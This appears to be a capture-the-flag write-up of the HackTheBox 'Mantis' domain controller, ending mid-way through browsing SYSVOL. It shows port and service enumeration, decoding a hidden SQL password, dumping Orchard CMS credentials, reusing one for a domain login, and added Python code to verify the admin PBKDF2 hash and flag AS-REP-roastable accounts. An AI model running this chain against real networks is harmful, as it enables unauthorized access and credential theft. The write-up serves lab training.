Mantis

nmap scan

└─$ nmap -sV -sC -oA mantis 10.10.10.52 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 22:55 EDT
Nmap scan report for 10.10.10.52
Host is up (0.34s latency).
Not shown: 981 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-18 02:56:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-info:
| 10.10.10.52:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.10.52:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
|_ssl-date: 2023-09-18T02:57:46+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-09-18T02:43:16
|_Not valid after: 2053-09-18T02:43:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/7.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Tossed Salad – Blog
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 48m00s, deviation: 1h47m21s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2023-09-17T22:57:31-04:00
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-09-18T02:57:32
|_ start_date: 2023-09-18T02:43:09

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.80 seconds

Points worth noting from the scan: this is the domain controller for htb.local (DNS, Kerberos on 88, LDAP on 389/636 and the global catalog on 3268/3269), running Windows Server 2008 R2 SP1, with SQL Server 2014 RTM on 1433 and an IIS 7.5 site on 8080. SMB signing is required, so NTLM relay to SMB is not an option here.

adding the domain to the hosts file

/etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.10.175    EGOTISTICAL-BANK.LOCAL
10.10.10.100    active.htb  htb
10.10.10.192    blackfield.local
10.10.10.182    cascade.local
10.10.11.152    timelapse.htb
10.10.10.169    megabank.local  resolute.megabank.local
10.10.10.52     htb.local  mantis.htb.local

ldapsearch

naming context

                                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ ldapsearch -x -H ldap://10.10.10.52 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

searching for valid usernames with an anonymous subtree search. no luck: the DC refuses anything beyond the rootDSE without an authenticated bind, so anonymous LDAP enumeration is off the table

└─$ ldapsearch -x -H ldap://10.10.10.52 -b 'DC=htb,DC=local' -s sub
# extended LDIF
#
# LDAPv3
# base <DC=htb,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C09075A, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v1db1

# numResponses: 1
                                                                                                                                                                                                                                              

smbclient: the anonymous login is accepted but no shares are listed, and smbmap returns nothing either

┌──(kali㉿kali)-[~/HTB/mantis]
└─$ smbclient -L //10.10.10.52 
Password for [WORKGROUP\kali]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.52 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
                                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ smbclient -L //10.10.10.52 -N -U%                     

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.52 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
                                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ smbmap -H 10.10.10.52

Try rpcclient with two options:

rpcclient -U '' 10.10.10.52        --> blank username, prompts for a password
rpcclient -U '' -N 10.10.10.52     --> blank username and no password prompt (null session)
└─$ rpcclient -U '' 10.10.10.52
Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
                                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ rpcclient -U '' -N 10.10.10.52
rpcclient $> 

trying some rpcclient commands over the null session. no permissions: every query comes back NT_STATUS_ACCESS_DENIED

result was NT_STATUS_ACCESS_DENIED
rpcclient $> querydispinfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED

GetNPUsers (AS-REP roasting)

└─$ ./GetNPUsers.py -dc-ip 10.10.10.52 -request 'htb.local/'

Nothing useful comes back: without a username list the script has to enumerate users over LDAP, and the DC refuses that anonymously.
                                                                                                                     

password policy. crackmapexec --pass-pol without credentials only prints the banner; the null session cannot read the policy over SAMR

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 10.10.10.52 --pass-pol
SMB         10.10.10.52     445    MANTIS           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
                                                                                                                     

tried mssqlclient.py with Windows authentication and a guessed account. SQL Server wants a domain account for Windows auth, so the login is rejected as coming from an untrusted domain

└─$ ./mssqlclient.py [email protected] -windows-auth

Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Encryption required, switching to TLS
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
                                                                                        

Tried enumerating http://10.10.10.52:8080 with gobuster but got nothing useful after checking each endpoint

gobuster dir -u http://10.10.10.52:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

out of the rabbit hole

Tried a full port scan but it kept failing before completion (over a 340 ms VPN link -T4 drops easily; splitting the port range or setting --min-rate / --max-retries usually gets it through)

nmap -p- -T4 -oA full 10.10.10.52 -Pn

Got a hint that port 1337 is open, so scanned that port directly

┌──(kali㉿kali)-[~/HTB/mantis]
└─$ nmap -p 1337 10.10.10.52              
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-21 18:09 EDT
Nmap scan report for htb.local (10.10.10.52)
Host is up (0.34s latency).

PORT     STATE SERVICE
1337/tcp open  waste

Nmap done: 1 IP address (1 host up) scanned in 0.74 seconds

a web page opens at http://10.10.10.52:1337/

Enumerating this with gobuster

gobuster dir -u http://10.10.10.52:1337/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

i also ran the same with ffuf to see if it gets anything faster

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.52:1337/FUZZ

ffuf is definitely much faster and gave me a result much quicker. Will be using it

└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.52:1337/FUZZ


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.52:1337/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 339ms]
    * FUZZ: # Copyright 2007 James Fisher

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms]
    * FUZZ: # or send a letter to Creative Commons, 171 Second Street, 

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms]
    * FUZZ: # on atleast 2 different hosts

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms]
    * FUZZ: #

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms]
    * FUZZ: 

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms]
    * FUZZ: # This work is licensed under the Creative Commons 

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms]
    * FUZZ: #

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 344ms]
    * FUZZ: # license, visit http://creativecommons.org/licenses/by-sa/3.0/ 

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 344ms]
    * FUZZ: # Priority ordered case sensative list, where entries were found 

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 345ms]
    * FUZZ: # Attribution-Share Alike 3.0 License. To view a copy of this 

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 345ms]
    * FUZZ: # Suite 300, San Francisco, California, 94105, USA.

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 346ms]
    * FUZZ: #

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 346ms]
    * FUZZ: # directory-list-2.3-medium.txt

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 346ms]
    * FUZZ: #

[Status: 500, Size: 3026, Words: 683, Lines: 73, Duration: 617ms]
    * FUZZ: orchard

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 340ms]
    * FUZZ: 

[Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 347ms]
    * FUZZ: secure_notes

The run also "matched" every comment line of the wordlist, because the server answers 200 with the same 689-byte page for junk paths; ffuf's -ic flag skips wordlist comments and -fs 689 filters out that default response. The real hits are orchard (500) and secure_notes (301).

browsing /secure_notes/ turned up this file

http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt

1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.

from ChatGPT, on the string in the filename:

The string "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" appears to be encoded in Base64 format. Base64 is a group of binary-to-text encoding schemes that represent binary data in an ASCII string format. To determine its original content, you would need to decode it from Base64.

decoding the base64 and then converting the resulting hex to ASCII

└─$ echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d
6d2424716c5f53405f504073735730726421                                                                                                                     
┌──(kali㉿kali)-[~/Downloads]
└─$ echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d | xxd -r -p
m$ql_S@_P@ssW0rd!                                                                                                                     

we are going to try to connect to the SQL server with the admin credentials using mssqlclient.py. This is a SQL login (no -windows-auth): the dev notes say an "admin" user was created in SQL Server Express, and the decoded string looks like its password

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./mssqlclient.py admin:'m$ql_S@_P@ssW0rd!'@10.10.10.52

Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208) 
[!] Press help for extra shell commands
SQL (admin  admin@master)>

some commands to interact with the SQL server

To list all databases:                          SELECT name FROM sys.databases;
To switch to a database (replace the name):     USE YourDatabaseName;
Once inside a database, to list all tables:     SELECT name FROM sys.tables;
To see the columns of a table (replace the name):
    SELECT column_name, data_type, character_maximum_length 
    FROM information_schema.columns 
    WHERE table_name = 'YourTableName';

Looking for usernames, starting with the SQL logins (only sa and admin exist; the CMS users live in the orcharddb database)

SQL (admin  admin@master)> USE master;
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
SQL (admin  admin@master)> SELECT name, type_desc FROM sys.server_principals WHERE type IN ('U', 'G', 'S');
name    type_desc   
-----   ---------   
sa      SQL_LOGIN   

admin   SQL_LOGIN   


recommendation from ChatGPT on where Orchard keeps its users

**User and Role Information**:

- `blog_Orchard_Users_UserPartRecord`: This might contain user-specific information.

After switching with USE orcharddb, fetch all columns from this table (a first attempt with a malformed WHERE clause errored out, then the plain SELECT worked)

[-] ERROR(MANTIS\SQLEXPRESS): Line 1: Incorrect syntax near the keyword 'WHERE'.
SQL (admin  admin@orcharddb)> SELECT * FROM blog_Orchard_Users_UserPartRecord;
Id   UserName   Email             NormalizedUserName   Password                                                               PasswordFormat   HashAlgorithm   PasswordSalt               RegistrationStatus   EmailStatus   EmailChallengeToken   CreatedUtc            LastLoginUtc          LastLogoutUtc         
--   --------   ---------------   ------------------   --------------------------------------------------------------------   --------------   -------------   ------------------------   ------------------   -----------   -------------------   -------------------   -------------------   -------------------   
 2   admin                        admin                AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==   Hashed           PBKDF2          UBwWF1CQCsaGc/P7jIR/kg==   Approved             Approved      NULL                  2017-09-01 13:44:01   2017-09-01 14:03:50   2017-09-01 14:06:31   

15   James      [email protected]   james                J@m3s_P@ssW0rd!                                                        Plaintext        Plaintext       NA                         Approved             Approved      NULL                  2017-09-01 13:45:44   NULL                  NULL                  

SQL (admin  admin@orcharddb)> 

we can see two CMS accounts: admin, whose password is stored hashed (PasswordFormat Hashed, HashAlgorithm PBKDF2, with a per-user PasswordSalt), and james, whose password J@m3s_P@ssW0rd! is stored with PasswordFormat Plaintext. A CMS storing a credential in the clear is already a finding on its own; the next step is to see whether the same password is reused for the domain account
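The admin row is the only one that needs any work. As an added example (not code from the original write-up and not Orchard's own code), the block below parses that stored hash and implements a verifier for it. The blob layout is assumed to be the ASP.NET System.Web.Helpers.Crypto.HashPassword format (version byte 0x00, 16-byte salt, 32-byte PBKDF2-HMAC-SHA1 subkey, 1000 iterations), which matches the 49 decoded bytes; the way Orchard folds the separate PasswordSalt column into the candidate before hashing (salt bytes prepended to the UTF-16LE password and decoded back to a string) is an assumption about Orchard 1.x and is labelled as such in the code. The admin hash and salt are the values from the table above; the candidate password in the test is constructed.

```python
"""Added example: parse and verify the PBKDF2 blob Orchard stores for admin.

Assumptions (labelled): the blob is base64(0x00 || salt16 || subkey32) with
PBKDF2-HMAC-SHA1 and 1000 iterations (System.Web.Helpers.Crypto.HashPassword),
and Orchard hashes Encoding.Unicode.GetString(PasswordSalt || UTF-16LE(password))
rather than the bare password. Neither the Orchard source nor the real admin
password is on this page, so the verifier is only exercised with a constructed
hash that this block produces itself.
"""
import base64
import hashlib
import hmac
import os

ITERATIONS = 1000   # System.Web.Helpers default
SALT_LEN = 16
SUBKEY_LEN = 32

# Values copied from the blog_Orchard_Users_UserPartRecord dump on this page.
ADMIN_HASH = "AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A=="
ADMIN_SALT = "UBwWF1CQCsaGc/P7jIR/kg=="


def parse_aspnet_hash(stored_b64):
    """Split a System.Web.Helpers hash into (version, salt, subkey)."""
    raw = base64.b64decode(stored_b64)
    if len(raw) != 1 + SALT_LEN + SUBKEY_LEN:
        raise ValueError("unexpected hash length %d" % len(raw))
    return raw[0], raw[1:1 + SALT_LEN], raw[1 + SALT_LEN:]


def aspnet_hash_password(password_str, salt=None):
    """Crypto.HashPassword: PBKDF2-HMAC-SHA1 over the UTF-8 password, 1000 rounds."""
    salt = os.urandom(SALT_LEN) if salt is None else salt
    subkey = hashlib.pbkdf2_hmac("sha1", password_str.encode("utf-8"), salt,
                                 ITERATIONS, SUBKEY_LEN)
    return base64.b64encode(b"\x00" + salt + subkey).decode("ascii")


def orchard_candidate_string(password, password_salt_b64):
    """ASSUMPTION: Orchard feeds Encoding.Unicode.GetString(salt || UTF-16LE(pw)) to HashPassword."""
    salt_bytes = base64.b64decode(password_salt_b64)
    combined = salt_bytes + password.encode("utf-16-le")
    # .NET replaces undecodable code units with U+FFFD; Python's 'replace' does the same.
    return combined.decode("utf-16-le", errors="replace")


def verify_orchard_pbkdf2(stored_b64, password_salt_b64, candidate):
    """True if candidate reproduces the stored subkey (constant-time compare)."""
    version, salt, subkey = parse_aspnet_hash(stored_b64)
    if version != 0:
        return False
    pw = orchard_candidate_string(candidate, password_salt_b64)
    computed = hashlib.pbkdf2_hmac("sha1", pw.encode("utf-8"), salt,
                                   ITERATIONS, SUBKEY_LEN)
    return hmac.compare_digest(computed, subkey)


if __name__ == "__main__":
    version, salt, subkey = parse_aspnet_hash(ADMIN_HASH)
    print("version=%d salt=%s subkey_len=%d" % (version, salt.hex(), len(subkey)))
    for guess in ("admin", "m$ql_S@_P@ssW0rd!"):
        print("%-20s -> %s" % (guess, verify_orchard_pbkdf2(ADMIN_HASH, ADMIN_SALT, guess)))
```

To run a wordlist against it, loop over candidates and call verify_orchard_pbkdf2 with ADMIN_HASH and ADMIN_SALT; at 1000 PBKDF2 rounds this is slow in pure Python, which is the point of the algorithm. The james row needs none of this: a Plaintext PasswordFormat means the value in the Password column is the password.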

Trying crackmapexec with this, i.e. the CMS password against the domain account james

┌──(kali㉿kali)-[~/HTB/mantis]
└─$ crackmapexec smb 10.10.10.52 -u 'james' -p 'J@m3s_P@ssW0rd!'
SMB         10.10.10.52     445    MANTIS           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.10.10.52     445    MANTIS           [+] htb.local\james:J@m3s_P@ssW0rd! 
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ crackmapexec smb 10.10.10.52 -u 'james' -p 'J@m3s_P@ssW0rd!' --shares
SMB         10.10.10.52     445    MANTIS           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.10.10.52     445    MANTIS           [+] htb.local\james:J@m3s_P@ssW0rd! 
SMB         10.10.10.52     445    MANTIS           [+] Enumerated shares
SMB         10.10.10.52     445    MANTIS           Share           Permissions     Remark
SMB         10.10.10.52     445    MANTIS           -----           -----------     ------
SMB         10.10.10.52     445    MANTIS           ADMIN$                          Remote Admin
SMB         10.10.10.52     445    MANTIS           C$                              Default share
SMB         10.10.10.52     445    MANTIS           IPC$                            Remote IPC
SMB         10.10.10.52     445    MANTIS           NETLOGON        READ            Logon server share 
SMB         10.10.10.52     445    MANTIS           SYSVOL          READ            Logon server share 
                                                                                                          

trying winrm but this fails: port 5985 was not in the scan, and the connection is refused whatever credential is used

┌──(kali㉿kali)-[~/HTB/mantis]
└─$ crackmapexec winrm 10.10.10.52 -u 'james' -p 'J@m3s_P@ssW0rd!'     

┌──(kali㉿kali)-[~/HTB/mantis]
└─$ evil-winrm -i  10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'     
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
                                        
Error: An error of type Errno::ECONNREFUSED happened, message is Connection refused - Connection refused - connect(2) for "10.10.10.52" port 5985 (10.10.10.52:5985)
                                        
Error: Exiting with code 1
                                                                                                                     
trying rpcclient with james's credentials

└─$ rpcclient -U james 10.10.10.52
Password for [WORKGROUP\james]:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[james] rid:[0x44f]
rpcclient $> querydispinfo
index: 0xdea RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xdeb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xea6 RID: 0x44f acb: 0x00000210 Account: james Name: James Desc: (null)
index: 0xe19 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[DnsUpdateProxy] rid:[0x44e]
rpcclient $> queryuser james
User Name : james
Full Name : James
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description :
Workstations:
Comment :
Remote Dial :
Logon Time : Sun, 24 Dec 2017 09:39:48 EST
Logoff Time : Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time : Wed, 13 Sep 30828 22:48:05 EDT
Password last set Time : Thu, 31 Aug 2017 20:12:02 EDT
Password can change Time : Fri, 01 Sep 2017 20:12:02 EDT
Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT
unknown_2[0..31]...
user_rid : 0x44f
group_rid: 0x201
acb_info : 0x00000210
fields_present: 0x00ffffff


getting the SID for james with lookupnames. The last component, 1103, is the RID (0x44f above); everything before it is the domain SID

rpcclient $> lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)
rpcclient $> 
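The acb values in the querydispinfo and queryuser output are SAMR account-control bit masks, and they answer the question the earlier GetNPUsers run left open: AS-REP roasting only works against enabled accounts with "do not require Kerberos pre-authentication" set. The block below is an added example (not from the original write-up) that decodes those masks from the querydispinfo lines on this page; the bit names and values are the ACB_* flags from Samba's samr.idl, and the sample text is copied from the output above.

```python
"""Added example: decode rpcclient acb_info flags and spot AS-REP roastable accounts.

The flag values are the SAMR ACB_* bits (Samba librpc/idl/samr.idl). The input
lines are the querydispinfo output from this page, embedded here as sample data.
"""
import re

ACB_FLAGS = {
    0x00000001: "DISABLED",
    0x00000002: "HOMDIRREQ",
    0x00000004: "PWNOTREQ",
    0x00000008: "TEMPDUP",
    0x00000010: "NORMAL",
    0x00000020: "MNS",
    0x00000040: "DOMTRUST",
    0x00000080: "WSTRUST",
    0x00000100: "SVRTRUST",
    0x00000200: "PWNOEXP",
    0x00000400: "AUTOLOCK",
    0x00000800: "ENC_TXT_PWD_ALLOWED",
    0x00001000: "SMARTCARD_REQUIRED",
    0x00002000: "TRUSTED_FOR_DELEGATION",
    0x00004000: "NOT_DELEGATED",
    0x00008000: "USE_DES_KEY_ONLY",
    0x00010000: "DONT_REQUIRE_PREAUTH",
    0x00020000: "PW_EXPIRED",
}

# Sample input: the querydispinfo lines from this page.
QUERYDISPINFO = """\
index: 0xdea RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xdeb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xea6 RID: 0x44f acb: 0x00000210 Account: james Name: James Desc: (null)
index: 0xe19 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
"""

LINE_RE = re.compile(r"RID: (0x[0-9a-fA-F]+) acb: (0x[0-9a-fA-F]+) Account: (\S+)")


def decode_acb(value):
    """Return the set of ACB_* names whose bit is set in an acb_info word."""
    return {name for bit, name in ACB_FLAGS.items() if value & bit}


def parse_querydispinfo(text):
    """Map account name -> {'rid': int, 'acb': int, 'flags': set} from querydispinfo lines."""
    accounts = {}
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        rid, acb, name = int(m.group(1), 16), int(m.group(2), 16), m.group(3)
        accounts[name] = {"rid": rid, "acb": acb, "flags": decode_acb(acb)}
    return accounts


def asrep_roastable(accounts):
    """Enabled accounts with DONT_REQUIRE_PREAUTH set: the only ones GetNPUsers can hit."""
    return sorted(name for name, a in accounts.items()
                  if "DONT_REQUIRE_PREAUTH" in a["flags"] and "DISABLED" not in a["flags"])


if __name__ == "__main__":
    accts = parse_querydispinfo(QUERYDISPINFO)
    for name, a in accts.items():
        print("%-14s rid=%-5d %s" % (name, a["rid"], " | ".join(sorted(a["flags"]))))
    print("AS-REP roastable:", asrep_roastable(accts) or "none")
```

On this box no account carries DONT_REQUIRE_PREAUTH, so GetNPUsers would have come back empty even with james's credentials; what the flags do show is that james and Administrator have non-expiring passwords (PWNOEXP) and that Guest and krbtgt are disabled.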

 
checking NETLOGON and SYSVOL with james's credentials. There was nothing in NETLOGON

downloaded the Registry.pol file locally
└─$ smbclient \\\\10.10.10.52\\SYSVOL -U james%J@m3s_P@ssW0rd!

Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Aug 31 20:05:10 2017
  ..                                  D        0  Thu Aug 31 20:05:10 2017
  htb.local                          Dr        0  Thu Aug 31 20:05:10 2017

                5217023 blocks of size 4096. 938803 blocks available
smb: \> cd htb.local
smb: \htb.local\> ls
  .                                   D        0  Thu Aug 31 20:06:29 2017
  ..                                  D        0  Thu Aug 31 20:06:29 2017
  DfsrPrivate                      DHSr        0  Thu Aug 31 20:06:29 2017
  Policies                            D        0  Thu Aug 31 20:05:19 2017
  scripts                             D        0  Thu Aug 31 20:05:10 2017

                5217023 blocks of size 4096. 938803 blocks available
smb: \htb.local\> cd scripts
smb: \htb.local\scripts\> ls
  .                                   D        0  Thu Aug 31 20:05:10 2017
  ..                                  D        0  Thu Aug 31 20:05:10 2017

                5217023 blocks of size 4096. 938803 blocks available
smb: \htb.local\scripts\> cd ../\
smb: \htb.local\> cd DfsrPrivate
cd \htb.local\DfsrPrivate\: NT_STATUS_ACCESS_DENIED
smb: \htb.local\> cd Policies
smb: \htb.local\Policies\> ls
  .                                   D        0  Thu Aug 31 20:05:19 2017
  ..                                  D        0  Thu Aug 31 20:05:19 2017
  {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Thu Aug 31 20:05:19 2017
  {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Thu Aug 31 20:05:19 2017

                5217023 blocks of size 4096. 938803 blocks available
smb: \htb.local\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
  .                                   D        0  Thu Aug 31 20:05:19 2017
  ..                                  D        0  Thu Aug 31 20:05:19 2017
  GPT.INI                             A       22  Thu Aug 31 20:08:27 2017
  MACHINE                             D        0  Thu Aug 31 20:08:27 2017
  USER                                D        0  Thu Aug 31 20:05:19 2017
                5217023 blocks of size 4096. 939173 blocks available
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd USER
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> ls
